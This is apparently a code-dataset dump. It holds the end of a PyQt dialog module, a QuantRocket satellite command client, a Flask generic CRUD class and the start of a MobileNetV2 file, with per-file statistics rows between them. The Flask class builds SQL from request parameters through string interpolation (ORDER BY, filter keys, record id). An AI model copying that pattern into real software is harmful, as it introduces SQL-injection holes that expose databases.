self.setCurrentItem(item)
def getcurrent(self):
return self.currentItem()
@classmethod
def new_treeitem(self, itemtext):
"""build new item for tree
"""
item = qtw.QTreeWidgetItem()
item.setText(0, itemtext)
item.setToolTip(0, itemtext)
return item
@classmethod
def add_subitem(self, parent, child, ix=-1):
"add a subnode to a node. If ix is provided, it should indicate a position"
if ix == -1:
parent.addChild(child)
else:
parent.insertChild(ix, child)
@classmethod
def remove_subitem(self, parent, ix):
"remove a subnode from a node. If ix is provided, it should indicate a position"
parent.takeChild(ix)
@classmethod
def get_subitems(self, item):
"returns a list of a tree item's children"
return [item.child(i) for i in range(item.childCount())]
@classmethod
def set_itemtext(self, item, itemtext):
"sets the text of a tree item"
item.setText(0, itemtext)
item.setToolTip(0, itemtext)
@classmethod
def get_itemtext(self, item):
"returns the text of a tree item"
return item.text(0)
@classmethod
def getitemparentpos(self, item):
"return parent of current item and sequential position under it"
root = item.parent()
if root:
pos = root.indexOfChild(item)
else:
pos = -1
return root, pos
@classmethod
def expand_item(self, item):
"show the item's subitems"
item.setExpanded(True)
@classmethod
def collapse_item(self, item):
"hide the item's subitems"
item.setExpanded(False)
class LogDialog(qtw.QDialog):
"Simple Log display"
text = "css definition that triggers this message:\n\n"
def __init__(self, parent, log):
self.parent = parent
super().__init__(parent)
self.setWindowTitle(self.parent.master.app_title + " - show log for current file")
## self.setWindowIcon(self.parent.app_icon)
txt = qtw.QLabel("Dubbelklik op een regel om de context "
"(definitie in de css) te bekijken")
self.lijst = qtw.QListWidget(self)
## self.lijst.setSelectionMode(gui.QAbstractItemView.SingleSelection)
self.lijst.addItems(log)
b1 = qtw.QPushButton("&Toon Context", self)
b1.clicked.connect(self.show_context)
b2 = qtw.QPushButton("&Klaar", self)
b2.clicked.connect(self.done)
vbox = qtw.QVBoxLayout()
hbox = qtw.QHBoxLayout()
hbox.addWidget(txt)
vbox.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addWidget(self.lijst)
vbox.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addWidget(b1)
hbox.addWidget(b2)
hbox.insertStretch(0, 1)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.setLayout(vbox)
self.resize(600, 480)
self.exec_()
def itemDoubleClicked(self, item):
"""handler for doubleclicking over a line
"""
self.show_context(item)
def show_context(self, item=None):
"""show full logline (in case it's been chopped off)
and the definition that triggered it
"""
# determine selected line in the list and get associated data
# import pdb; pdb.set_trace()
selected = item or self.lijst.currentItem()
y = parse_log_line(selected.text())
context = get_definition_from_file(self.parent.master.project_file, y.line, y.pos)
# pop up a box to show the data
title = self.parent.master.app_title + " - show context for log message"
qtw.QMessageBox.information(self, title, self.text + context)
def done(self, arg=None):
"""finish dialog
"""
super().done(0)
class TextDialog(qtw.QDialog):
"""dialoog om een ongedefinieerde tekst (bv. van een commentaar) weer te geven
d.m.v. een multiline tekst box
"""
def __init__(self, parent, title='', text=''): # , comment=False):
self._parent = parent
super().__init__(parent)
self.setWindowTitle(title)
self.resize(440, 280)
vbox = qtw.QVBoxLayout()
hbox = qtw.QHBoxLayout()
self.data_text = qtw.QTextEdit(self)
## self.data_text.resize(440, 280)
hbox.addSpacing(50)
self.data_text.setText(text)
hbox.addWidget(self.data_text)
hbox.addSpacing(50)
vbox.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addStretch()
btn = qtw.QPushButton('&Save', self)
btn.clicked.connect(self.on_ok)
btn.setDefault(True)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Cancel', self)
btn.clicked.connect(self.on_cancel)
hbox.addWidget(btn)
hbox.addStretch()
vbox.addLayout(hbox)
self.setLayout(vbox)
self.data_text.setFocus()
def on_cancel(self):
"""callback for cancel button (should be replaced by connecting to reject?)
"""
super().reject()
def on_ok(self):
"""confirm changed text
"""
self._parent.dialog_data = str(self.data_text.toPlainText())
super().accept()
class GridDialog(qtw.QDialog):
"""dialoog om stijl definities voor een (groep van) selector(s) op te voeren
of te wijzigen
"""
def __init__(self, parent, title='', itemlist=None): # , comment=False):
self._parent = parent
super().__init__(parent)
self.setWindowTitle(title)
## self.setWindowIcon(gui.QIcon(os.path.join(PPATH,"ashe.ico")))
vbox = qtw.QVBoxLayout()
sbox = qtw.QFrame()
sbox.setFrameStyle(qtw.QFrame.Box)
box = qtw.QVBoxLayout()
hbox = qtw.QHBoxLayout()
hbox.addStretch()
hbox.addWidget(qtw.QLabel("Items in table:", self))
hbox.addStretch()
box.addLayout(hbox)
hbox = qtw.QHBoxLayout()
self.attr_table = qtw.QTableWidget(self)
## self.attr_table.resize(540, 340)
self.attr_table.setColumnCount(2)
        self.attr_table.setHorizontalHeaderLabels(['property', 'value'])  # header labels can only be changed this way
hdr = self.attr_table.horizontalHeader()
## hdr.setMinimumSectionSize(340)
hdr.resizeSection(0, 102)
hdr.resizeSection(1, 152)
hdr.setStretchLastSection(True)
self.attr_table.verticalHeader().setVisible(False)
self.attr_table.setTabKeyNavigation(False)
## self.attr_table.SetColSize(1, tbl.Size[0] - 162) # 178) # 160)
if itemlist is not None:
for attr, value in itemlist:
idx = self.attr_table.rowCount()
self.attr_table.insertRow(idx)
item = qtw.QTableWidgetItem(attr)
self.attr_table.setItem(idx, 0, item)
item = qtw.QTableWidgetItem(value)
self.attr_table.setItem(idx, 1, item)
else:
self.row = -1
## hbox.addStretch()
hbox.addWidget(self.attr_table)
## hbox.addStretch()
box.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addSpacing(50)
btn = qtw.QPushButton('&Add Item', self)
btn.clicked.connect(self.on_add)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Delete Selected', self)
btn.clicked.connect(self.on_del)
hbox.addWidget(btn)
hbox.addSpacing(50)
box.addLayout(hbox)
sbox.setLayout(box)
vbox.addWidget(sbox)
hbox = qtw.QHBoxLayout()
hbox.addStretch()
btn = qtw.QPushButton('&Save', self)
btn.clicked.connect(self.on_ok)
btn.setDefault(True)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Cancel', self)
btn.clicked.connect(self.on_cancel)
hbox.addWidget(btn)
vbox.addLayout(hbox)
hbox.addStretch()
self.setLayout(vbox)
## def on_resize(self, evt=None):
## self.attr_table.SetColSize(1, self.attr_table.GetSize()[0] - 162) # 178) # 160)
## self.attr_table.ForceRefresh()
def on_add(self):
"""property toevoegen:
in dit geval hoef ik alleen maar een lege regel aan de tabel toe te voegen
"""
## self.attr_table.setFocus()
num = self.attr_table.rowCount()
self.attr_table.setRowCount(num + 1)
        ## self.attr_table.insertRow(idx) # why not addRow?
## self.attr_table.setCurrentCell(idx, 0)
def on_del(self):
"""attribuut verwijderen
"""
ok = qtw.QMessageBox.question(self, 'Delete row from table', 'Are you sure?',
qtw.QMessageBox.Ok | qtw.QMessageBox.Cancel,
qtw.QMessageBox.Ok)
if ok == qtw.QMessageBox.Ok:
self.attr_table.removeRow(self.attr_table.currentRow())
def on_cancel(self):
"""callback for cancel button (should be replaced by connecting to reject?)
"""
## qtw.QDialog.done(self, qtw.QDialog.Rejected)
super().reject()
def on_ok(self):
"""controle bij OK aanklikken
"""
proplist = []
for i in range(self.attr_table.rowCount()):
name_item = self.attr_table.item(i, 0)
value_item = self.attr_table.item(i, 1)
if not name_item or not value_item:
qtw.QMessageBox.information(self, "Can't continue",
'Not all values are entered and confirmed')
return
proplist.append((str(name_item.text()), str(value_item.text())))
self._parent.dialog_data = proplist
## qtw.QDialog.done(self, qtw.QDialog.Accepted)
super().accept()
class ListDialog(qtw.QDialog):
"""dialoog om een list type property toe te voegen of te wijzigen
"""
def __init__(self, parent, title='', itemlist=None): # , comment=False):
self._parent = parent
super().__init__(parent)
self.setWindowTitle(title)
self.is_rules_node = "'rules'" in title
vbox = qtw.QVBoxLayout()
sbox = qtw.QFrame()
sbox.setFrameStyle(qtw.QFrame.Box)
box = qtw.QVBoxLayout()
hbox = qtw.QHBoxLayout()
hbox.addStretch()
hbox.addWidget(qtw.QLabel("Items in list:", self))
hbox.addStretch()
vbox.addLayout(hbox)
self.list = qtw.QListWidget(self)
if itemlist is not None:
self.list.addItems([self._parent.tree.get_itemtext(x) for x in itemlist])
hbox = qtw.QHBoxLayout()
hbox.addSpacing(50)
hbox.addWidget(self.list)
hbox.addSpacing(50)
box.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addStretch()
btn = qtw.QPushButton('&Add Item', self)
btn.clicked.connect(self.on_add)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Edit Selected', self)
btn.clicked.connect(self.on_edit)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Delete Selected', self)
btn.clicked.connect(self.on_del)
hbox.addWidget(btn)
hbox.addStretch()
box.addLayout(hbox)
sbox.setLayout(box)
vbox.addWidget(sbox)
hbox = qtw.QHBoxLayout()
hbox.addStretch()
btn = qtw.QPushButton('&Save', self)
btn.clicked.connect(self.on_ok)
btn.setDefault(True)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Cancel', self)
btn.clicked.connect(self.on_cancel)
hbox.addWidget(btn)
vbox.addLayout(hbox)
hbox.addStretch()
self.setLayout(vbox)
def on_add(self):
"item toevoegen"
if self.is_rules_node:
ruletypes = sorted([(x, y[0]) for x, y in ed.RTYPES.items()],
key=lambda item: item[1])
options = [x[1] for x in ruletypes]
text, ok = qtw.QInputDialog.getItem(
self, self._parent.app_title, "Choose type for this rule", options,
editable=False)
else:
            text, ok = qtw.QInputDialog.getText(
                self, 'Add item to list', 'Enter text for this item')
        if ok:  # only add the item when the dialog was confirmed
            self.list.addItem(text)
def on_edit(self):
"item wijzigen"
current = self.list.currentItem()
oldtext = current.text()
if self.is_rules_node:
ruletypes = sorted([(x, y[0]) for x, y in ed.RTYPES.items()],
key=lambda item: item[1])
options = [x[1] for x in ruletypes]
current_index = options.index(oldtext) if oldtext else 0
text, ok = qtw.QInputDialog.getItem(
self, self._parent.app_title, "Choose type for this rule", options,
current_index, editable=False)
else:
text, ok = qtw.QInputDialog.getText(
self, 'Edit list item', 'Enter text for this item:', text=oldtext)
if ok and text != oldtext:
current.setText(text)
def on_del(self):
"item verwijderen"
ok = qtw.QMessageBox.question(self, 'Delete item from list', 'Are you sure?',
qtw.QMessageBox.Ok | qtw.QMessageBox.Cancel,
qtw.QMessageBox.Ok)
if ok == qtw.QMessageBox.Ok:
self.list.takeItem(self.list.currentRow())
def on_cancel(self):
"""callback for cancel button (should be replaced by connecting to reject?)
"""
## qtw.QDialog.done(self, qtw.QDialog.Rejected)
super().reject()
def on_ok(self):
"""bij OK: de opgebouwde list via self.dialog_data doorgeven
aan het mainwindow
"""
list_data = []
for row in range(self.list.count()):
list_data.append(str(self.list.item(row).text()))
self._parent.dialog_data = list_data
## qtw.QDialog.done(self, qtw.QDialog.Accepted)
super().accept()
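A minimal sketch of driving the GUI standalone, assuming a master object that exposes the attributes the widgets read (app_title, app_iconame, actiondict); DummyMaster is hypothetical:
class DummyMaster:
    # hypothetical stand-in for the real csseditor master object
    app_title = 'cssedit'
    app_iconame = ''
    actiondict = {}
    def close(self):
        pass

gui = MainGui(DummyMaster(), app=None)  # app=None makes MainGui build its own QApplication
gui.just_show()                         # enters the Qt event loop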
| 35.302292
| 97
| 0.582363
| 2,820
| 24,641
| 5.008511
| 0.203546
| 0.023364
| 0.023931
| 0.017134
| 0.386576
| 0.348556
| 0.310394
| 0.268267
| 0.241008
| 0.217077
| 0
| 0.008041
| 0.308591
| 24,641
| 697
| 98
| 35.352941
| 0.820978
| 0.25628
| 0
| 0.401345
| 0
| 0
| 0.078799
| 0.001867
| 0
| 0
| 0
| 0.001435
| 0
| 1
| 0.130045
| false
| 0.002242
| 0.013453
| 0.004484
| 0.190583
| 0.004484
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2bb261a73c74317e9f4c04091925e5a2fa1f5e
| 2,199
|
py
|
Python
|
quantrocket/satellite.py
|
Jay-Jay-D/quantrocket-client
|
b70ac199382d22d56fad923ca2233ce027f3264a
|
[
"Apache-2.0"
] | null | null | null |
quantrocket/satellite.py
|
Jay-Jay-D/quantrocket-client
|
b70ac199382d22d56fad923ca2233ce027f3264a
|
[
"Apache-2.0"
] | null | null | null |
quantrocket/satellite.py
|
Jay-Jay-D/quantrocket-client
|
b70ac199382d22d56fad923ca2233ce027f3264a
|
[
"Apache-2.0"
] | 1
|
2019-06-12T11:34:27.000Z
|
2019-06-12T11:34:27.000Z
|
# Copyright 2017 QuantRocket - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from quantrocket.houston import houston
from quantrocket.cli.utils.output import json_to_cli
from quantrocket.cli.utils.files import write_response_to_filepath_or_buffer
def execute_command(service, cmd, return_file=None, filepath_or_buffer=None):
"""
    Execute an arbitrary command on a satellite service and optionally return a file.
Parameters
----------
service : str, required
the service name
cmd: str, required
the command to run
return_file : str, optional
the path of a file to be returned after the command completes
filepath_or_buffer : str, optional
the location to write the return_file (omit to write to stdout)
Returns
-------
dict or None
None if return_file, otherwise status message
"""
params = {}
if not service:
raise ValueError("a service is required")
if not cmd:
raise ValueError("a command is required")
params["cmd"] = cmd
if return_file:
params["return_file"] = return_file
if not service.startswith("satellite"):
raise ValueError("service must start with 'satellite'")
response = houston.post("/{0}/commands".format(service), params=params, timeout=60*60*24)
houston.raise_for_status_with_json(response)
if return_file:
filepath_or_buffer = filepath_or_buffer or sys.stdout
write_response_to_filepath_or_buffer(filepath_or_buffer, response)
else:
return response.json()
def _cli_execute_command(*args, **kwargs):
return json_to_cli(execute_command, *args, **kwargs)
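A minimal usage sketch based on the docstring above; the service name, command, and paths are hypothetical:
from quantrocket.satellite import execute_command

execute_command(
    "satellite1",                      # must start with 'satellite'
    "python /codeload/myscript.py",    # hypothetical command to run in the service
    return_file="/tmp/output.csv",     # hypothetical file produced by the command
    filepath_or_buffer="output.csv")   # written locally instead of stdout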
| 32.820896
| 93
| 0.71578
| 305
| 2,199
| 5.02623
| 0.4
| 0.052185
| 0.073059
| 0.020874
| 0.10698
| 0.071755
| 0
| 0
| 0
| 0
| 0
| 0.008601
| 0.206912
| 2,199
| 66
| 94
| 33.318182
| 0.870413
| 0.473852
| 0
| 0.083333
| 0
| 0
| 0.105312
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.166667
| 0.041667
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2ea9cb95f216543b39462cef45459a422c0631
| 12,367
|
py
|
Python
|
blog_server/app/comm/GeneralOperate.py
|
szhu9903/flask-react-blog
|
b1939a5d95e0084a82c230f2a20a9b197d2eef46
|
[
"MIT"
] | 2
|
2022-03-12T14:51:42.000Z
|
2022-03-25T13:20:16.000Z
|
blog_server/app/comm/GeneralOperate.py
|
szhu9903/flask-react-blog
|
b1939a5d95e0084a82c230f2a20a9b197d2eef46
|
[
"MIT"
] | 7
|
2022-03-19T02:17:54.000Z
|
2022-03-28T10:12:52.000Z
|
blog_server/app/comm/GeneralOperate.py
|
szhu9903/flask-react-blog
|
b1939a5d95e0084a82c230f2a20a9b197d2eef46
|
[
"MIT"
] | 1
|
2022-03-25T13:20:28.000Z
|
2022-03-25T13:20:28.000Z
|
import copy
from flask import g
from app.comm.TableModule import TableModule
from app.comm.SqlExecute import SqlExecute
from app.unit_config import default_result, default_limit_size, depth_post_map
class GeneralOperate(object):
def __init__(self, module:TableModule):
self.module = module
        # request-parameter check chains
self.get_deal_func_link = []
self.post_deal_func_link = []
self.put_deal_func_link = []
self.delete_deal_func_link = []
self.init_check_func_link()
    # initialize the request handling chains
def init_check_func_link(self):
self.get_deal_func_link.extend([
self.check_get_permissions,
self.check_view_param,
self.check_pagination_param,
self.before_deal_get,
self.deal_get_data,
self.after_deal_get,
])
self.post_deal_func_link.extend([
self.check_operation_permissions,
self.check_request_data,
self.check_column_data,
self.before_deal_post,
self.deal_post_data,
self.after_deal_post,
])
self.put_deal_func_link.extend([
self.check_operation_permissions,
self.check_request_data,
self.check_unique_record,
self.check_column_data,
self.before_deal_put,
self.deal_put_data,
self.after_deal_put,
])
self.delete_deal_func_link.extend([
self.check_operation_permissions,
self.check_unique_record,
self.before_deal_delete,
self.deal_delete_data,
self.after_deal_delete,
])
    # general - parse and initialize the request parameters
    def init_general_data(self, request):
        g.args_data = request.args.to_dict()  # URL parameters
        g.is_continue_exec = True  # outcome of running the check chain
        if request.method in ["POST", "PUT"]:
            g.json_data = request.json
        g.view_args = request.view_args  # dynamic URL path parameters
    # handle GET requests
def deal_get_method(self, request):
        # initialize parameters
self.init_general_data(request)
        # run the handler function chain
for deal_func in self.get_deal_func_link:
deal_func()
            # leave the check chain when a step failed
if not g.is_continue_exec:
break
return g.result
    # handle GET -> check permissions
def check_get_permissions(self):
return
    # handle GET -> check the view parameter
def check_view_param(self):
view = g.args_data.get("view")
if view:
if (not self.module.view_list) or (view not in self.module.view_list):
g.is_continue_exec = False
g.result['message'] = f"view({view}):视图不存在! "
    # handle GET -> check the pagination parameters
def check_pagination_param(self):
pagination = g.args_data.get("pagination")
if pagination:
page_index, page_size = pagination.split(',')
if (not page_index.isdigit()) and (not page_size.isdigit()):
g.is_continue_exec = False
g.result['message'] = f"pagination({pagination}):分页数据错误,参考格式:index,size! "
    # handle GET -> operations before fetching the data
def before_deal_get(self):
return
    # handle GET -> fetch the data
    def deal_get_data(self):
        # total row count
self.filter_str, self.filter_args = self.get_filter_str()
total_count = self.query_total_count()
if not g.is_continue_exec:
g.result['message'] = '获取数据量失败!'
return
g.result['total_count'] = total_count
        # fetch the query result set
data = self.query_data()
if not g.is_continue_exec:
g.result['message'] = '获取结果集失败!'
return
g.result['data'] = data
    # handle GET -> fetch the data -> query the total row count
def query_total_count(self):
view = g.args_data.get('view')
if view:
count_query = self.module.views_query[view]['sql_query_count']
else:
count_query = self.module.sql_count_default
count_query = f'{count_query} {self.filter_str}'
total_count = SqlExecute.query_sql_data(count_query, self.filter_args)
return total_count[0]['total_count'] if g.is_continue_exec else None
    # handle GET -> fetch the data -> fetch the result set
def query_data(self):
default_sql = self.get_default_sql()
order_str = self.get_order_str()
pagination_str = self.get_pagination_str()
sql_default_query = f'{default_sql} {self.filter_str} {order_str} {pagination_str}'
        # fetch the result set
data = SqlExecute.query_sql_data(sql_default_query, self.filter_args)
return data if g.is_continue_exec else None
    # handle GET -> fetch the data -> fetch the result set -> default query statement
def get_default_sql(self):
view = g.args_data.get('view')
if view:
sql_query = self.module.views_query[view]['sql_query']
else:
sql_query = self.module.sql_query_default
return sql_query
    # handle GET -> fetch the data -> fetch the result set -> build the filter string and its arguments
def get_filter_str(self):
record_id = g.view_args.get('record_id')
filter_param = g.args_data.get('filter')
fuzzy_filter_param = g.args_data.get('fuzzyfilter')
filter_str = "where 1=1 "
filter_args = dict()
        # fetch a single detailed record
if record_id:
filter_str += "and id=%(id)s "
filter_args['id'] = record_id
return (filter_str, filter_args)
        # fuzzy filter conditions
if fuzzy_filter_param:
fuzzy_filter_list = fuzzy_filter_param.split(',')
for fuzzy_filter in fuzzy_filter_list:
fuzzy_key, fuzzy_val = fuzzy_filter.split('=')
filter_str += f"and ({fuzzy_key} like %({fuzzy_key})s) "
filter_args[fuzzy_key] = f"%{fuzzy_val}%"
        # exact filter conditions
if filter_param:
filter_args_list = filter_param.split(',')
for filter in filter_args_list:
filter_key, filter_val = filter.split('=')
if filter_key in filter_args.keys(): continue
filter_str += f"and ({filter_key}=%({filter_key})s) "
filter_args[filter_key] = filter_val
return (filter_str, filter_args)
    # handle GET -> fetch the data -> fetch the result set -> build the ORDER BY string
    def get_order_str(self):
        # sort conditions
order_param = g.args_data.get('order')
order_str = ""
if order_param:
order_str = order_param.replace('|', ',')
order_str = 'order by %s' % (order_str)
return order_str
    # handle GET -> fetch the data -> fetch the result set -> build the pagination string
    def get_pagination_str(self):
        # build the LIMIT clause
pagination_param = g.args_data.get('pagination')
pagination_str = ""
if pagination_param:
page_index, page_size = pagination_param.split(',')
page_index = 1 if int(page_index) < 1 else int(page_index)
page_size = 1 if int(page_size) < 1 else int(page_size)
pagination_str = 'limit %d, %d' % ((page_index - 1) * page_size, page_size)
return pagination_str if pagination_str else f"limit {default_limit_size}"
    # handle GET -> post-processing after fetching the data
def after_deal_get(self):
return
    # handle POST requests
    def deal_post_method(self, request):
        # initialize parameters
        self.init_general_data(request)
        # run the handler chain
        for deal_func in self.post_deal_func_link:
            deal_func()
            # leave the check chain when a step failed
            if not g.is_continue_exec:
                break
        return g.result
    # [POST, PUT, DELETE] check operation permissions
def check_operation_permissions(self):
return
    # [POST, PUT] check the structure of the submitted request body
def check_request_data(self):
if not g.json_data:
g.is_continue_exec = False
g.result["message"] = '无要提交的数据~'
if 'data' not in g.json_data.keys():
g.is_continue_exec = False
g.result["message"] = '参数不完整:缺少data参数~'
    # [POST, PUT] validate the effective data columns and drop invalid ones
def check_column_data(self):
req_data = g.json_data["data"]
table_column = self.module.colnames
req_data_keys = list(req_data.keys())
for data_key in req_data_keys:
if (req_data[data_key] is None) or (len(str(req_data[data_key])) == 0):
del req_data[data_key]
continue
if (data_key not in table_column) and (data_key not in depth_post_map):
g.is_continue_exec = False
g.result['code'] = 0x11
g.result["message"] = f'非法列名:{data_key}~'
    # POST: operations before submitting the data
    def before_deal_post(self):
        return
    # POST: submit the data
def deal_post_data(self):
sqlExecute = SqlExecute()
self.transact_post_before(sqlExecute)
if not g.is_continue_exec:
return
self.transact_post(sqlExecute)
if not g.is_continue_exec:
return
self.transact_post_after(sqlExecute)
if not g.is_continue_exec:
return
sqlExecute.commit()
    # transaction step before the insert
def transact_post_before(self, cursor):
return
    # insert the POSTed data
def transact_post(self, cursor):
insert_data = g.json_data['data'].copy()
if g.json_data.get("type", None) == "replace":
sql_insert = self.module.get_insert_sql(insert_data, is_replace=True)
else:
sql_insert = self.module.get_insert_sql(insert_data)
insert_data_keys = list(insert_data.keys())
for col_name in insert_data_keys:
if col_name in depth_post_map: del insert_data[col_name]
rowid = cursor.transact_commit_sql_data(sql_insert, insert_data)
g.result['rowid'] = rowid
    # transaction step after the insert
    def transact_post_after(self, cursor):
        return
    # POST: operations after submitting
    def after_deal_post(self):
        return
    # handle PUT requests
def deal_put_method(self, request):
        # initialize parameters
self.init_general_data(request)
        # run the handler chain
for deal_func in self.put_deal_func_link:
deal_func()
            # leave the check chain when a step failed
if not g.is_continue_exec:
break
return g.result
    # [PUT, DELETE] before modifying or deleting, check that exactly one record matches
def check_unique_record(self):
record = g.view_args['record_id']
query_sql = f" {self.module.sql_query_default} where id={record}"
data = SqlExecute.query_sql_data(query_sql)
if not g.is_continue_exec:
return
if len(data) == 0:
g.is_continue_exec = False
g.result["message"] = "未匹配到要操作的数据"
return
    # PUT: operations before submitting the data
    def before_deal_put(self):
        return
    # PUT: submit the data
def deal_put_data(self):
sqlExecute = SqlExecute()
self.transact_put_before(sqlExecute)
if not g.is_continue_exec:
return
self.transact_put(sqlExecute)
if not g.is_continue_exec:
return
self.transact_put_after(sqlExecute)
if not g.is_continue_exec:
return
sqlExecute.commit()
    # put: transaction step before the commit
def transact_put_before(self, cursor):
pass
    # put: commit the transaction
def transact_put(self, cursor):
record_id = g.view_args['record_id']
update_data = g.json_data['data'].copy()
sql_update = self.module.get_update_sql(update_data, record_id)
insert_data_keys = list(update_data.keys())
for col_name in insert_data_keys:
if col_name in depth_post_map: del update_data[col_name]
cursor.transact_commit_sql_data(sql_update, update_data)
if not g.is_continue_exec:
return
g.result['rowid'] = record_id
    # put: transaction step after the commit
    def transact_put_after(self, cursor):
        pass
    # PUT: operations after submitting
    def after_deal_put(self):
        return
    # handle DELETE requests
def deal_delete_method(self, request):
        # initialize parameters
self.init_general_data(request)
        # run the handler chain
for deal_func in self.delete_deal_func_link:
deal_func()
            # leave the check chain when a step failed
if not g.is_continue_exec:
break
return g.result
    # DELETE: operations before deleting
    def before_deal_delete(self):
        return
    # DELETE: delete the data
def deal_delete_data(self):
record_id = g.view_args['record_id']
sql_delete = self.module.get_delete_sql(record_id)
SqlExecute.commit_sql_data(sql_delete)
if not g.is_continue_exec:
return
g.result['rowid'] = record_id
    # DELETE: operations after deleting
def after_deal_delete(self):
return
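A minimal sketch of how a concrete resource could plug into this class, assuming a TableModule instance configured elsewhere (ArticleOperate and article_module are hypothetical):
from flask import request

class ArticleOperate(GeneralOperate):
    # hypothetical subclass hooking one step of the POST chain
    def before_deal_post(self):
        g.json_data['data'].setdefault('status', 'draft')

article_operate = ArticleOperate(article_module)  # article_module: a configured TableModule

# inside a Flask view function:
#     return article_operate.deal_post_method(request)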
| 32.890957
| 91
| 0.602248
| 1,549
| 12,367
| 4.491285
| 0.114267
| 0.010349
| 0.037947
| 0.051746
| 0.406353
| 0.330315
| 0.290068
| 0.265919
| 0.240621
| 0.189162
| 0
| 0.001516
| 0.306542
| 12,367
| 375
| 92
| 32.978667
| 0.809701
| 0.068246
| 0
| 0.345324
| 0
| 0
| 0.06064
| 0.009598
| 0
| 0
| 0.000349
| 0
| 0
| 1
| 0.136691
| false
| 0.007194
| 0.017986
| 0.043165
| 0.284173
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2ec99c88e89e1bd90620cd1221b2fc2ec8cc12
| 4,921
|
py
|
Python
|
SmartDeal-Training/models/mobilenetv2_se_mask.py
|
VITA-Group/SmartDeal
|
8e1de77497eedbeea412a8c51142834c28a53709
|
[
"MIT"
] | 2
|
2021-07-20T02:48:35.000Z
|
2021-11-29T02:55:36.000Z
|
SmartDeal-Training/models/mobilenetv2_se_mask.py
|
VITA-Group/SmartDeal
|
8e1de77497eedbeea412a8c51142834c28a53709
|
[
"MIT"
] | null | null | null |
SmartDeal-Training/models/mobilenetv2_se_mask.py
|
VITA-Group/SmartDeal
|
8e1de77497eedbeea412a8c51142834c28a53709
|
[
"MIT"
] | null | null | null |
'''MobileNetV2 in PyTorch.
See the paper "Inverted Residuals and Linear Bottlenecks:
Mobile Networks for Classification, Detection and Segmentation" for more details.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from se import SEConv2d, SELinear
THRESHOLD = 4e-3
__all__ = ['SEMaskMobileNetV2']
def conv3x3(in_planes, out_planes, stride=1, groups=1):
"""3x3 convolution with padding"""
# return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
return SEConv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, groups=groups, bias=False, threshold=THRESHOLD)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
# return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
return SEConv2d(in_planes, out_planes, kernel_size=1, stride=stride,
bias=False, threshold=THRESHOLD)
class Block(nn.Module):
'''expand + depthwise + pointwise'''
def __init__(self, in_planes, out_planes, expansion, stride):
super(Block, self).__init__()
self.stride = stride
planes = expansion * in_planes
# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, stride=1, padding=0, bias=False)
# self.bn1 = nn.BatchNorm2d(planes)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, groups=planes, bias=False)
# self.bn2 = nn.BatchNorm2d(planes)
# self.conv3 = nn.Conv2d(planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
# self.bn3 = nn.BatchNorm2d(out_planes)
self.conv1 = conv1x1(in_planes, planes, stride=1)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride=stride, groups=planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = conv1x1(planes, out_planes, stride=1)
self.bn3 = nn.BatchNorm2d(out_planes)
self.shortcut = nn.Sequential()
if stride == 1 and in_planes != out_planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False),
conv1x1(in_planes, out_planes, stride=1),
nn.BatchNorm2d(out_planes),
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out = out + self.shortcut(x) if self.stride==1 else out
return out
class SEMaskMobileNetV2(nn.Module):
# (expansion, out_planes, num_blocks, stride)
cfg = [(1, 16, 1, 1),
(6, 24, 2, 1), # NOTE: change stride 2 -> 1 for CIFAR10
(6, 32, 3, 2),
(6, 64, 4, 2),
(6, 96, 3, 1),
(6, 160, 3, 2),
(6, 320, 1, 1)]
def __init__(self, num_classes=10, threshold=4e-3):
super(SEMaskMobileNetV2, self).__init__()
# NOTE: change conv1 stride 2 -> 1 for CIFAR10
